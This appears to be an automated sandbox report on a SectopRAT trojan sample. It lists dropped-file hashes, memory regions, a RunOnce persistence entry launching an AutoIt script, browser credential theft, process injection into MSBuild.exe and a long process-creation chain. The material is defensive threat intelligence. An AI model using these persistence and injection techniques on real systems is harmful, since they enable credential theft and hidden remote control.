C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\resources.jar

MD5 9a084b91667e7437574236cd27b7c688
SHA1 d8926cc4aa12d6fe9abe64c8c3cb8bc0f594c5b1
SHA256 a1366a75454fc0f1ca5a14ea03b4927bb8584d6d5b402dfa453122ae16dbf22d
SHA512 d603aa29e1f6eefff4b15c7ebc8a0fa18e090d2e1147d56fd80581c7404ee1cb9d6972fcf2bd0cb24926b3af4dfc5be9bce1fe018681f22a38adaa278bf22d73

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\msvcr120.dll

MD5 034ccadc1c073e4216e9466b720f9849
SHA1 f19e9d8317161edc7d3e963cc0fc46bd5e4a55a1
SHA256 86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f
SHA512 5f11ef92d936669ee834a5cef5c7d0e7703bf05d03dc4f09b9dcfe048d7d5adfaab6a9c7f42e8080a5e9aad44a35f39f3940d5cca20623d9cafe373c635570f7

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\msvcp120.dll

MD5 fd5cabbe52272bd76007b68186ebaf00
SHA1 efd1e306c1092c17f6944cc6bf9a1bfad4d14613
SHA256 87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608
SHA512 1563c8257d85274267089cd4aeac0884a2a300ff17f84bdb64d567300543aa9cd57101d8408d0077b01a600ddf2e804f7890902c2590af103d2c53ff03d9e4a5

memory/2104-407-0x0000000000910000-0x0000000000911000-memory.dmp

memory/2104-410-0x0000000000910000-0x0000000000911000-memory.dmp

memory/2104-428-0x0000000000910000-0x0000000000911000-memory.dmp

memory/2104-431-0x0000000000910000-0x0000000000911000-memory.dmp

memory/3136-434-0x00000000053B0000-0x00000000053E6000-memory.dmp

memory/1272-435-0x00000000052B0000-0x00000000058DA000-memory.dmp

memory/1272-436-0x0000000004FF0000-0x0000000005012000-memory.dmp

memory/1272-438-0x0000000005200000-0x0000000005266000-memory.dmp

memory/1272-437-0x0000000005190000-0x00000000051F6000-memory.dmp

memory/1272-447-0x00000000059E0000-0x0000000005D37000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2n1mq5ad.1bm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3136-456-0x0000000006820000-0x000000000683E000-memory.dmp

memory/3136-457-0x0000000006860000-0x00000000068AC000-memory.dmp

memory/2104-458-0x0000000000910000-0x0000000000911000-memory.dmp

memory/1272-459-0x0000000006E00000-0x0000000006E96000-memory.dmp

memory/1272-460-0x0000000006370000-0x000000000638A000-memory.dmp

memory/3136-461-0x0000000006DA0000-0x0000000006DC2000-memory.dmp

memory/3136-462-0x0000000007E50000-0x00000000083F6000-memory.dmp

memory/3964-475-0x0000000006280000-0x00000000065D7000-memory.dmp

memory/3964-484-0x0000000007720000-0x0000000007754000-memory.dmp

memory/3964-485-0x000000006D670000-0x000000006D6BC000-memory.dmp

memory/3964-494-0x0000000007700000-0x000000000771E000-memory.dmp

memory/3964-495-0x00000000079A0000-0x0000000007A44000-memory.dmp

memory/3964-496-0x00000000080E0000-0x000000000875A000-memory.dmp

memory/1940-497-0x000000006D670000-0x000000006D6BC000-memory.dmp

memory/3964-506-0x0000000007B30000-0x0000000007B3A000-memory.dmp

memory/1940-507-0x0000000007960000-0x0000000007971000-memory.dmp

memory/3964-508-0x0000000007D00000-0x0000000007D0E000-memory.dmp

memory/1940-509-0x00000000079B0000-0x00000000079C5000-memory.dmp

memory/3964-510-0x0000000007E00000-0x0000000007E1A000-memory.dmp

memory/1940-511-0x0000000007A90000-0x0000000007A98000-memory.dmp

memory/3748-515-0x0000000000400000-0x0000000000588000-memory.dmp

memory/3748-519-0x0000000000400000-0x0000000000588000-memory.dmp

memory/2588-520-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2104-527-0x0000000000910000-0x0000000000911000-memory.dmp

memory/2104-553-0x0000000000910000-0x0000000000911000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-OAJ1K.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/3800-737-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/3800-738-0x00000000054F0000-0x0000000005582000-memory.dmp

memory/3800-739-0x0000000005830000-0x00000000059F2000-memory.dmp

memory/3800-740-0x0000000005590000-0x0000000005606000-memory.dmp

memory/3800-741-0x0000000005660000-0x00000000056B0000-memory.dmp

memory/3800-742-0x0000000005480000-0x000000000548A000-memory.dmp

memory/3800-743-0x0000000006720000-0x0000000006C4C000-memory.dmp

memory/3800-744-0x0000000006220000-0x000000000623E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpF68D.tmp

MD5 a603e09d617fea7517059b4924b1df93
SHA1 31d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256 ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512 eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

C:\Users\Admin\AppData\Local\Temp\tmpF6B0.tmp

MD5 22be08f683bcc01d7a9799bbd2c10041
SHA1 2efb6041cf3d6e67970135e592569c76fc4c41de
SHA256 451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457
SHA512 0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936

memory/3800-768-0x0000000007ED0000-0x0000000007EDA000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-04 20:12

Reported

2024-09-04 20:15

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe"

Signatures

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Downloads MZ/PE file

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\abbkkce = "\"C:\\eegeaeg\\AutoIt3.exe\" C:\\eegeaeg\\abbkkce.a3x" C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4840 set thread context of 4520 N/A C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3736 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp
PID 3736 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp
PID 3736 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp
PID 2292 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 2292 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 3360 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3360 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3360 wrote to memory of 4868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3360 wrote to memory of 4868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2292 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 2292 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 4940 wrote to memory of 3312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4940 wrote to memory of 3312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4940 wrote to memory of 4576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4940 wrote to memory of 4576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4576 wrote to memory of 5076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tar.exe
PID 4576 wrote to memory of 5076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tar.exe
PID 4940 wrote to memory of 452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4940 wrote to memory of 452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4940 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe
PID 4940 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe
PID 4940 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe
PID 3092 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe
PID 3092 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe
PID 3092 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe
PID 3432 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 3432 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 3432 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 3432 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 3432 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 3432 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 4844 wrote to memory of 1908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4844 wrote to memory of 1908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4844 wrote to memory of 1908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3120 wrote to memory of 4448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3120 wrote to memory of 4448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3120 wrote to memory of 4448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3432 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\explorer.exe
PID 3432 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\explorer.exe
PID 3432 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\explorer.exe
PID 4552 wrote to memory of 1080 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe
PID 4552 wrote to memory of 1080 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe
PID 4552 wrote to memory of 1080 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe
PID 1080 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp
PID 1080 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp
PID 1080 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp
PID 1180 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe
PID 1180 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe
PID 1180 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe
PID 1036 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp
PID 1036 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp
